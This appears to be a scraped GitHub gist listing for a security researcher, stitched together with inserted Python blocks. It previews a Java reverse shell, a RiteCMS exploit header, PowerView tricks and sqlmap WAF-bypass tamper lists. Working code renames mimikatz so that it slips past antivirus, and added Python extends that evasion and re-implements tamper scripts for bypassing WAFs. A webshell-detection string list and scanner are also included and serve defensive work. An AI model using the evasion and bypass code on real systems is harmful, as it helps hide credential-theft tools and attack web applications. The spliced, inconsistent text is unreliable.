Faisal Fs ⚔️ faisalfs10x
@faisalfs10x
faisalfs10x / PowerView-3.0-tricks.ps1
Created June 27, 2022 04:30 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@faisalfs10x
faisalfs10x / C.java
Created December 14, 2021 09:02 — forked from caseydunham/C.java
Java Reverse Shell
// Not sure where I originally got this from.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class C {
public C() throws Exception {
String host="10.0.0.90";
@faisalfs10x
faisalfs10x / squid_proxy_tutorial.md
Last active October 21, 2021 14:44 — forked from jackblk/squid_proxy_tutorial.md
Tutorial on how to setup a squid proxy with authentication.

Note

This tutorial targets Ubuntu with the Squid3 packages; any provider that gives you an Ubuntu machine (AWS, Google Cloud, DigitalOcean, ...) will do. Note that on newer Ubuntu releases the package is named squid and squid3 remains only as a transitional package, so adjust the install command below if apt cannot find squid3.

Install squid & update

sudo apt-get update -y
sudo apt-get install squid3 -y
sudo apt-get install apache2-utils -y
@faisalfs10x
faisalfs10x / RiteCMS - Arbitrary File Overwrite (Authenticated).txt
Last active December 22, 2021 10:23
# RiteCMS version 3.1.0 suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the cap…
# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# This script downloads the mimikatz project and lightly "obfuscates" it.
# Most AV solutions flag mimikatz on certain strings in the binary ("mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com", ...),
# so removing them from the source before compiling gets the build past most AV solutions.
# One could go further and also change functionality keywords ("sekurlsa", "logonpasswords", "lsadump", "minidump", "pth", ...),
# but that means adapting the documentation and your own usage as well, so it has not been done here; try it if the target's AV still detects mimikatz after this script.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
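The following is an added example (not the gist's code) that does the same token rename as the mv and sed lines above in Python, also renaming files rather than only the top-level directory, and reporting what still references the old name afterwards. The sample tree it builds is constructed for illustration; the token handling assumes an alphanumeric name and a plain directory tree on GNU/Linux.

```python
"""Added example, not the forked gist's own code: the same rename as the mv + sed
lines above, done in Python so that file *names* as well as file contents are
rewritten and so that a leftover check can be run afterwards. Assumes a plain
directory tree (no .git handling) and an alphanumeric token; the sample tree is
constructed here and only stands in for the real checkout."""
import os
import re
import tempfile
from typing import Dict, List

def case_variants(old: str, new: str) -> Dict[str, str]:
    """lower / UPPER / Capitalised spellings, the three the sed lines would need."""
    return {old.lower(): new.lower(), old.upper(): new.upper(),
            old.capitalize(): new.capitalize()}

def _swap(text: str, table: Dict[str, str]) -> str:
    pattern = re.compile("|".join(re.escape(k) for k in table))
    return pattern.sub(lambda m: table[m.group(0)], text)

def _is_text(path: str) -> bool:
    """Binaries (icons, prebuilt libraries) are skipped for content edits; a NUL in
    the first 8 KiB is the usual grep -I heuristic."""
    with open(path, "rb") as fh:
        return b"\x00" not in fh.read(8192)

def rename_token(root: str, old: str, new: str) -> int:
    """Rewrite text contents, then rename paths bottom-up (children before their
    parent, so a renamed parent never invalidates a child path). Returns the
    number of files and directories renamed."""
    table = case_variants(old, new)
    renamed = 0
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not _is_text(path):
                continue
            with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
                data = fh.read()
            patched = _swap(data, table)
            if patched != data:
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(patched)
        for name in filenames + dirnames:
            new_name = _swap(name, table)
            if new_name != name:
                os.rename(os.path.join(dirpath, name), os.path.join(dirpath, new_name))
                renamed += 1
    return renamed

def remaining_refs(root: str, old: str) -> List[str]:
    """Paths whose name or raw bytes still contain the token (case-insensitive).
    Binaries are included here on purpose: a string the text pass could not safely
    touch is exactly what an AV signature may still key on."""
    needle = old.lower().encode()
    left = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            hit = needle in name.lower().encode()
            if not hit and name in filenames:
                with open(path, "rb") as fh:
                    hit = needle in fh.read().lower()
            if hit:
                left.append(path)
    return sorted(left)

def make_sample_tree(root: str) -> None:
    """Constructed stand-in for the cloned repository."""
    os.makedirs(os.path.join(root, "mimikatz", "modules"))
    texts = {
        "mimikatz/mimikatz.c": '// mimikatz entry point\nconst char *banner = "MIMIKATZ";\n',
        "mimikatz/modules/kuhl_m_sekurlsa.c": "// module Mimikatz sekurlsa\n",
        "mimikatz.sln": 'Project("mimikatz.vcxproj")\n',
    }
    for rel, body in texts.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    with open(os.path.join(root, "mimikatz", "mimikatz.ico"), "wb") as fh:
        fh.write(b"\x00\x00\x01\x00mimikatz")   # binary: name renamed, bytes left alone

def demo() -> dict:
    root = tempfile.mkdtemp()
    make_sample_tree(root)
    before = len(remaining_refs(root, "mimikatz"))
    renamed = rename_token(root, "mimikatz", "candycrush")
    after = [os.path.relpath(p, root) for p in remaining_refs(root, "mimikatz")]
    with open(os.path.join(root, "candycrush.sln")) as fh:
        sln = fh.read()
    return {"before": before, "renamed": renamed, "after": after, "sln": sln}

if __name__ == "__main__":
    print(demo())
```

Run it as-is to see the before/after state on the sample tree; point rename_token at a real checkout only after backing it up, and treat a non-empty remaining_refs list (here the .ico bytes) as work still to do, since a string left inside a binary asset is exactly what a signature may still match on.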
@faisalfs10x
faisalfs10x / pwd2NTLM.py
Created April 17, 2021 13:40
plaintext password to NTLM hash for password auditing
import hashlib
import argparse
parser = argparse.ArgumentParser(description='Password to NTLM')
parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM")
args = parser.parse_args()
wordfile = args.wordlist
total_converted = 0
f = open(wordfile, "r")
https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
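As an added example (not sqlmap's code and not the linked article's), here are minimal re-implementations of a few of the tamper scripts named above, chained the way sqlmap applies a --tamper= list. They show what each transform does to a payload and why the order of the list matters; the real scripts in sqlmap's tamper/ directory handle more cases (keyword-only randomcase, quoted strings) than these sketches do. The payloads are constructed.

```python
"""Added example, not from sqlmap or the linked article: toy versions of some of
the listed tamper scripts plus the left-to-right chaining that --tamper= performs."""
import random
import re
from typing import Callable, Dict, Optional, Sequence

def space2comment(payload: str) -> str:
    """' ' -> '/**/' : same SQL, but a signature keyed on "UNION SELECT" with a
    literal space no longer matches."""
    return payload.replace(" ", "/**/")

def space2plus(payload: str) -> str:
    return payload.replace(" ", "+")

def equaltolike(payload: str) -> str:
    """'=' -> ' LIKE ' (numeric and string comparisons both still evaluate)."""
    return re.sub(r"\s*=\s*", " LIKE ", payload)

def between(payload: str) -> str:
    """'A = B' -> 'A BETWEEN B AND B', 'A > B' -> 'A NOT BETWEEN 0 AND B'."""
    payload = re.sub(r"(\w+)\s*>\s*(\w+)", r"\1 NOT BETWEEN 0 AND \2", payload)
    return re.sub(r"(\w+)\s*=\s*(\w+)", r"\1 BETWEEN \2 AND \2", payload)

def randomcase(payload: str, rng: Optional[random.Random] = None) -> str:
    """Random per-letter case (the real script limits itself to SQL keywords);
    seeded here so that output is reproducible."""
    rng = rng or random.Random(1337)
    flip = lambda m: "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in m.group(0))
    return re.sub(r"[A-Za-z]+", flip, payload)

def charencode(payload: str) -> str:
    """URL-encode every character (%41%4E%44 ...); the web server decodes it again
    before the WAF-bypassed string reaches the SQL layer."""
    return "".join("%%%02X" % ord(c) for c in payload)

TAMPERS: Dict[str, Callable[[str], str]] = {
    "space2comment": space2comment, "space2plus": space2plus,
    "equaltolike": equaltolike, "between": between,
    "randomcase": randomcase, "charencode": charencode,
}

def apply_tampers(payload: str, names: Sequence[str]) -> str:
    """Apply the scripts left to right, as --tamper=a,b,c is processed: each one
    sees the output of the previous one, so a space-removing script must come
    after a script that introduces new spaces (see between vs space2comment)."""
    for name in names:
        payload = TAMPERS[name](payload)
    return payload

if __name__ == "__main__":
    p = "1 AND 1=1 UNION SELECT NULL,version()"   # constructed sample payload
    for chain in (["between", "space2comment"], ["space2comment", "between"],
                  ["equaltolike", "charencode"], ["randomcase", "space2plus"]):
        print(",".join(chain), "->", apply_tampers(p, chain))
```

Compare the first two chains in the demo: between before space2comment yields a payload with no literal spaces at all, while the reverse order re-introduces spaces around BETWEEN that the earlier script has already removed, which is the kind of detail the F5 evaluation below is measuring.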
@faisalfs10x
faisalfs10x / sqlmap-tamper-scripts-evaluation.md
Created February 15, 2021 02:55 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The table below shows the results of tests run against an F5 BIG-IP ASM WAF appliance, in its XX version of YY and ZZ version of XY.

The names below are the values to pass to sqlmap's --tamper= parameter.

The Violation Rating column gives the most common rating among the top 20 requests observed by F5 in its Security >> Event Logs : Application : Requests view.

The scale is 0-5.

@faisalfs10x
faisalfs10x / seclist_malicious.txt
Last active February 12, 2021 14:26
strings for finding backdoor shells, rootkits, botnets, and exploitable functions
# strings for finding backdoor shells, rootkits, botnets, and exploitable functions
# e.g. grep -Rn "shell *(" /var/www   (substitute each string below for "shell"; " *(" allows whitespace before the opening parenthesis)
exec
passthru
shell_exec
system
phpinfo
base64_decode
chmod
mkdir
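Added example, not part of the gist: a small Python scanner that uses the strings above the way the grep line intends, with a word boundary and optional whitespace before the opening parenthesis, and flags the classic user-input-into-sink shape separately so that the many legitimate mkdir/chmod hits are easier to triage. The PHP files it scans are constructed for illustration, and eval/assert are added to the list beyond the preview shown above.

```python
"""Added example (not part of the gist): grep-like scan of a web root for the
listed function names. \b stops "system" matching inside "filesystem"; \s*
catches "shell_exec (" with a space. The sample files are constructed here."""
import os
import re
import tempfile
from typing import List, Tuple

# Strings from the gist preview above, plus eval/assert (added here).
SUSPICIOUS_CALLS = ["exec", "passthru", "shell_exec", "system", "phpinfo",
                    "base64_decode", "chmod", "mkdir", "eval", "assert"]

CALL_RE = re.compile(r"\b(" + "|".join(map(re.escape, SUSPICIOUS_CALLS)) + r")\s*\(",
                     re.IGNORECASE)

# Webshell shape: request data flowing straight into an execution sink on one line.
SINK_WITH_INPUT_RE = re.compile(
    r"\b(eval|assert|system|exec|passthru|shell_exec)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE)

Hit = Tuple[str, int, str, str]   # (path, line_no, function, severity)

def scan_file(path: str) -> List[Hit]:
    hits: List[Hit] = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            for m in CALL_RE.finditer(line):
                sev = "high" if SINK_WITH_INPUT_RE.search(line) else "review"
                hits.append((path, no, m.group(1).lower(), sev))
    return hits

def scan_tree(root: str, exts=(".php", ".phtml", ".inc")) -> List[Hit]:
    """Walk the web root as `grep -Rn` would, restricted to PHP-ish extensions so
    that prose mentioning system() in a .txt file does not count."""
    hits: List[Hit] = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.lower().endswith(exts):
                hits.extend(scan_file(os.path.join(dirpath, name)))
    return hits

SAMPLE_FILES = {   # constructed, not real site code
    "index.php": "<?php\nmkdir($cache_dir, 0755);\necho filesystem_status();\n",
    "uploads/.x.php": "<?php eval(base64_decode($_POST['c']));\n",
    "lib/run.php": "<?php\n$out = shell_exec ('ls');\n",
    "notes.txt": "system(reboot) is mentioned here but this is not PHP\n",
}

def demo() -> List[Tuple[str, int, str, str]]:
    """Build the sample tree, scan it, return sorted (relpath, line, function, severity)."""
    root = tempfile.mkdtemp()
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return sorted((os.path.relpath(p, root), no, fn, sev) for p, no, fn, sev in scan_tree(root))

if __name__ == "__main__":
    for rel, no, fn, sev in demo():
        print("%s:%d  %s  [%s]" % (rel, no, fn, sev))
```

The "review" hits (mkdir in index.php, shell_exec in lib/run.php) are where the manual work is; the "high" hit in uploads/.x.php is the eval(base64_decode($_POST[...])) pattern, and a dot-prefixed PHP file under an uploads directory is itself a finding worth acting on.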
@faisalfs10x
faisalfs10x / router_b310.py
Created February 11, 2021 05:50
blacklist MAC address
#!/usr/bin/env python
# Faisalfs10x
import time, subprocess
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from datetime import datetime
def main():